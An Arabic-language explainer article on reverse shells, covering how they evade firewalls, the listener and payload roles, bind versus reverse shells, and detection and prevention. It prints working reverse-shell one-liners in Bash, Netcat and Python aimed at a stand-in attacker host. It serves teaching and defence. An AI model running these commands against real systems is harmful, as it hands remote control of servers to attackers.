شل عكسي

ملخص: شل عكسي

الشل العكسي، المعروف أيضًا باسم شل الاتصال الخلفي، هو عندما يتصل النظام المخترق بالمهاجم ويمنحه جلسة سطر أوامر مباشرة.

لماذا يهم هذا؟

• يمكن للشلات العكسية تجاوز الجدران النارية لأن معظم الجدران النارية تحظر الاتصالات الواردة ولكن تسمح بالخروج.
• يحصل المهاجمون على سيطرة حقيقية لأنهم يمكنهم تشغيل الأوامر كما لو كانوا مسجلين الدخول مباشرة.
• الشلات العكسية شائعة جدًا لأنها خطوة قياسية بعد أن يستغل المهاجم النظام.

تخيل الأمر بهذه الطريقة: بدلاً من محاولة المهاجم الدخول، يخدع الخادم للوصول إليهم.

ما هو الشل العكسي؟

الشل العكسي هو شل عن بعد حيث يبدأ كمبيوتر الضحية الاتصال بكمبيوتر المهاجم.

عادةً، يبدأ جهاز الكمبيوتر الخاص بك الاتصال، مثل عندما تزور موقع ويب. مع الشل العكسي، يتم عكس هذا. بعد أن يجد المهاجم طريقة لتشغيل الكود، يتصل الخادم بالمهاجم.

طريقة سهلة لتذكرها:

• شل الربط: تحاول الاتصال بالخادم. إذا قام جدار ناري بحظرك، لا يمكنك المرور.
• شل عكسي: يتصل الخادم بك. نظرًا لأن الاتصالات الخارجة مسموح بها عادةً، يمكنك الرد والسيطرة.

لماذا تهم الشلات العكسية

تركز فرق الأمان عادةً على الدفاعات مثل الجدران النارية، موازنات التحميل، وتقييد المنافذ. تعمل هذه حتى يتمكن المهاجم من تشغيل الكود داخل النظام.

عندما يحدث ذلك، يصبح الشل العكسي الطريقة الرئيسية للمهاجم للبقاء في النظام.

لماذا هذا خطير:

• يتم الوثوق في حركة المرور الصادرة.

  غالبًا ما تسمح الجدران النارية بحركة المرور الصادرة على منافذ مثل 80 أو 443 للتحديثات وواجهات برمجة التطبيقات. يمكن أن تختبئ الأصداف العكسية في هذه الحركة المسموح بها.

• يمكن للمهاجمين الحفاظ على الوصول.

  حتى إذا تم إصلاح الثغرة الأمنية الأصلية، يمكن للصدفة النشطة أن تسمح للمهاجمين بالتحكم في النظام.

• يمكنها تمكين الحركة الجانبية.

  باستخدام الصدفة، يمكن للمهاجمين استكشاف الشبكة الداخلية، وسرقة كلمات المرور، والانتقال إلى أجهزة كمبيوتر أخرى. يمكن أن تؤدي ثغرة واحدة بسرعة إلى تعرض البيئة بأكملها للخطر.

كيف تعمل الصدفة العكسية

تتكون الصدفة العكسية من جزئين رئيسيين: المستمع والحمولة.

1. المستمع (جانب المهاجم)

يستخدم المهاجم برنامجًا ينتظر الاتصالات. يعد Netcat أداة شائعة لهذا.

nc -lvnp 4444

يخبر هذا الأمر كمبيوتر المهاجم بالاستماع على المنفذ 4444 وانتظار الاتصال.

2. الحمولة (جانب الضحية)

بعد العثور على ثغرة مثل تنفيذ التعليمات البرمجية عن بعد، يقوم المهاجم بتشغيل أمر على خادم الضحية لفتح صدفة وإرسالها.

bash -i >& /dev/tcp/attacker-ip/4444 0>&1

يبدأ هذا الأمر صدفة bash ويرسل جميع المدخلات والمخرجات إلى كمبيوتر المهاجم.

3. الاتصال

يبدأ خادم الضحية اتصالاً صادرًا. يرى الجدار الناري هذا كأمر طبيعي ويسمح به. يقبل مستمع المهاجم الاتصال، مما يمنح المهاجم صدفة حية على الخادم.

في هذه المرحلة، يكون لدى المهاجم تحكم تفاعلي كامل في الخادم.

أمثلة شائعة للصدفة العكسية

يعدل المهاجمون والهاكرز الأخلاقيون نهجهم بناءً على الأدوات المتاحة في نظام الهدف.

باش (شائع في لينكس)

bash -i >& /dev/tcp/10.0.0.1/4444 0>&1

نتكات

يستخدم عندما يكون نتكات متاحًا على الجهاز الهدف.

nc -e /bin/sh 10.0.0.1 4444

بايثون

بايثون شائع جدًا في الخوادم الحديثة.

python -c 'import socket,subprocess,os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("10.0.0.1",4444));
os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);
subprocess.call(["/bin/sh","-i"]);'

الشيل العكسي مقابل الشيل المرتبط

معرفة الفرق بين الشيل العكسي والشيل المرتبط يساعد في الدفاع عن الشبكات.

الميزة	الشيل المرتبط	الشيل العكسي
اتجاه الاتصال	من المهاجم إلى الضحية	من الضحية إلى المهاجم
تأثير الجدار الناري	غالبًا ما يتم حظره	غالبًا ما يتم السماح به
متطلبات الشبكة	الوصول المباشر مطلوب	يعمل عبر NAT والجدران النارية
الاستخدام النموذجي	الشبكات الداخلية	الهجمات في العالم الحقيقي

من يستخدم الشيل العكسي؟

• مختبرو الاختراق يستخدمون الشيل العكسي لإثبات أن الثغرة يمكن أن تؤدي إلى اختراق كامل للنظام.
• فرق الحمراء تستخدم الشيل العكسي لاختبار مدى التحكم في حركة المرور الصادرة.
• الجهات الخبيثة تستخدم الشيل العكسي لنشر برامج الفدية، سرقة البيانات، أو التقدم أكثر في الشبكة.
• مديرو النظام نادرًا ما يستخدمون الشيل العكسي للوصول عن بُعد. يفضلون عادةً الأنفاق الآمنة عبر SSH.

الكشف والوقاية

يتطلب إيقاف الشيل العكسي عدة طبقات من الدفاع.

• تصفية حركة المرور الصادرة

  يجب ألا يكون لدى الخوادم وصول مفتوح إلى الإنترنت. قم بتحديد الوجهات والمنافذ التي يمكنهم استخدامها.

• مراقبة السلوك

  يعتبر تشغيل خادم ويب لعملية شل، مثل /bin/bash أو cmd.exe، أمرًا مشبوهًا للغاية.

• تقليل سطح الهجوم.

  قم بإزالة الأدوات غير المستخدمة مثل Netcat، والمجمعات، والمفسرات الإضافية من أنظمة الإنتاج.

المصطلحات ذات الصلة

• تنفيذ التعليمات البرمجية عن بُعد (RCE)
• شل الربط

الأسئلة الشائعة: شل العكسي

هل شل العكسي غير قانوني؟

شل العكسي قانوني فقط إذا كنت تستخدمه على أنظمة تمتلكها أو لديك إذن واضح لاختبارها. استخدامه بدون إذن غير قانوني.

لماذا تسمح الجدران النارية بشل العكسي؟

تم بناء الجدران النارية لحظر التهديدات الواردة وعادة ما تثق في حركة المرور الصادرة. يستغل شل العكسي هذا.

هل يمكن لبرنامج مكافحة الفيروسات اكتشاف شل العكسي؟

أحيانًا. يمكن لبرامج مكافحة الفيروسات التي تستخدم التوقيعات العثور على برامج شل المعروفة، لكن الشل الخالي من الملفات المصنوع باستخدام Bash أو Python يصعب اكتشافه.

ما الفرق بين شل العكسي وويب شل؟

ويب شل يُستخدم عبر المتصفح وعادة ما يبقى على النظام، لكنه يحتوي على ميزات محدودة. شل العكسي يوفر جلسة سطر أوامر تفاعلية مباشرة.